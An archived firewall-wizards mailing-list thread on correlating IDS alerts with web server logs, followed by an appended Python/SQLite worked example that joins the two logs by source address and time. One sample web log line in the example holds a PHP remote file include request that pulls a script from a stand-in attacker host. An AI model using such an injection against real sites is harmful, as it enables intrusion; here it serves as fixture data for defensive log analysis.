You can parse the logs in Perl and then populate either MS Access or a SQL-like database (MySQL, Sybase...) and run SQL queries. Surprisingly, you can go quite a long way with Access; it supports a database size of 2 GB. Using VB in Access you can automate a lot in terms of populating the database and running the queries.

Ashish Desai
Fidelity Investments

> -----Original Message-----
> From: Pete Storm [SMTP:petestormat_private]
> Sent: Tuesday, January 11, 2000 3:18 PM
> To: firewall-wizardsat_private
> Subject: Tools to correlate attacks b/w diff. logs
>
> Hi all,
>
> Does anyone know of a tool out there that will allow
> me to correlate incidents between several different
> logs? For example, if I see an attempt to pull off a
> PHP exploit on my IDS, it stands to reason that I'll
> see a similar log entry on my web server. What I'm
> looking for is something that will pull these two
> records out of the individual logs and place them in
> an "incident" log as a related event.
>
> The current problem is that we're talking about
> hundreds of thousands of log entries. Suppose I could
> Perl it, but I was kinda hoping there might be a
> commercial/shareware tool out there already that could
> do it so much better than I could.
>
> thanks,
> phs
>
> __________________________________________________
> Do You Yahoo!?
> Talk to your friends online with Yahoo! Messenger.
> http://im.yahoo.com
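The "parse, load into a database, join with SQL" approach from the reply above, as an added worked example that is not part of the thread and not code from any poster. Python and an in-memory SQLite database stand in for the Perl + Access/MySQL setup described; the IDS alert lines (Snort-style "fast" alert layout) and Apache combined-format access log lines are constructed for the example, the year supplied for the year-less IDS timestamps is an assumption, and both logs are assumed to be in the same local time zone. The correlation itself is one SQL join: same source address, alert aimed at port 80, request within a configurable time window of the alert.

```python
"""Correlate IDS alerts with web server log entries via SQL.

Added example (not from the firewall-wizards thread): parse both logs
into an in-memory SQLite database, then join them on source address and
time proximity. Python/SQLite stand in for Perl + Access/MySQL.
"""
import re
import sqlite3
from datetime import datetime

# Assumption: Snort-style "fast" alerts carry no year, so one is supplied.
LOG_YEAR = 2000

# Constructed sample data for the example (not real traffic).
IDS_LINES = """\
01/11-15:18:02.417233 [**] [1:1001:3] WEB-PHP remote file include attempt [**] {TCP} 10.0.0.5:33421 -> 192.168.1.10:80
01/11-15:19:40.002100 [**] [1:2002:1] TELNET login attempt [**] {TCP} 10.0.0.9:41002 -> 192.168.1.20:23
""".splitlines()

WEB_LINES = """\
10.0.0.5 - - [11/Jan/2000:15:18:03 -0500] "GET /index.php?page=http://evil.example/sh.txt HTTP/1.0" 200 512 "-" "Mozilla/4.0"
10.0.0.7 - - [11/Jan/2000:15:20:00 -0500] "GET /index.html HTTP/1.0" 200 2048 "-" "Mozilla/4.0"
10.0.0.5 - - [11/Jan/2000:16:45:10 -0500] "GET /about.html HTTP/1.0" 200 1024 "-" "Mozilla/4.0"
""".splitlines()

# Snort-style fast alert: MM/DD-HH:MM:SS.usec [**] [gid:sid:rev] msg [**] {proto} src:port -> dst:port
IDS_RE = re.compile(
    r'^(?P<mon>\d\d)/(?P<day>\d\d)-(?P<time>\d\d:\d\d:\d\d)\.\d+ \[\*\*\] '
    r'\[[\d:]+\] (?P<sig>.+?) \[\*\*\] \{(?P<proto>\w+)\} '
    r'(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)$')

# Apache combined log: ip ident user [date] "METHOD path proto" status bytes ...
WEB_RE = re.compile(
    r'^(?P<ip>[\d.]+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) ')


def parse_ids(line):
    """Return (epoch, signature, src_ip, dst_ip, dst_port) or None if unparseable."""
    m = IDS_RE.match(line)
    if not m:
        return None
    when = datetime.strptime(f"{LOG_YEAR}/{m['mon']}/{m['day']} {m['time']}",
                             "%Y/%m/%d %H:%M:%S")
    return (when.timestamp(), m['sig'], m['src'], m['dst'], int(m['dport']))


def parse_web(line):
    """Return (epoch, client_ip, method, path, status) or None if unparseable."""
    m = WEB_RE.match(line)
    if not m:
        return None
    # The UTC offset is dropped: both logs are assumed to use the same local zone.
    stamp = m['ts'].split(' ')[0]
    when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S")
    return (when.timestamp(), m['ip'], m['method'], m['path'], int(m['status']))


def build_db(ids_lines, web_lines):
    """Load both logs into an in-memory SQLite database (stand-in for Access/MySQL)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ids_alerts   (ts REAL, sig TEXT, src_ip TEXT, dst_ip TEXT, dst_port INTEGER);
        CREATE TABLE web_requests (ts REAL, client_ip TEXT, method TEXT, path TEXT, status INTEGER);
        -- Indexes on (address, time) keep the join cheap at hundreds of thousands of rows.
        CREATE INDEX ix_alerts_src ON ids_alerts (src_ip, ts);
        CREATE INDEX ix_web_client ON web_requests (client_ip, ts);
    """)
    db.executemany("INSERT INTO ids_alerts VALUES (?,?,?,?,?)",
                   [r for r in map(parse_ids, ids_lines) if r])
    db.executemany("INSERT INTO web_requests VALUES (?,?,?,?,?)",
                   [r for r in map(parse_web, web_lines) if r])
    return db


# The correlation: same source address, web-directed alert, request within the window.
CORRELATE_SQL = """
SELECT a.sig, a.src_ip, a.ts, w.ts, w.method, w.path, w.status
FROM ids_alerts a
JOIN web_requests w
  ON w.client_ip = a.src_ip
 AND ABS(w.ts - a.ts) <= :window
WHERE a.dst_port = 80
ORDER BY a.ts, w.ts
"""


def correlate(ids_lines, web_lines, window_seconds=60):
    """Return (signature, src_ip, alert_ts, request_ts, method, path, status) incident rows."""
    db = build_db(ids_lines, web_lines)
    rows = db.execute(CORRELATE_SQL, {"window": window_seconds}).fetchall()
    db.close()
    return rows


if __name__ == "__main__":
    for sig, ip, a_ts, w_ts, method, path, status in correlate(IDS_LINES, WEB_LINES):
        print(f"INCIDENT {datetime.fromtimestamp(a_ts):%Y-%m-%d %H:%M:%S} {ip} {sig!r} "
              f"-> {method} {path} {status} (+{w_ts - a_ts:.0f}s)")
```

With the default 60-second window only the PHP alert pairs with the matching request from 10.0.0.5; the telnet alert is filtered out by the port-80 condition and the later request from the same host falls outside the window. Widening the window to a couple of hours pulls that later request in as well, which is the usual tuning trade-off: a wide window catches slow attackers but inflates the incident log with unrelated traffic from the same address.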
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:57:16 PDT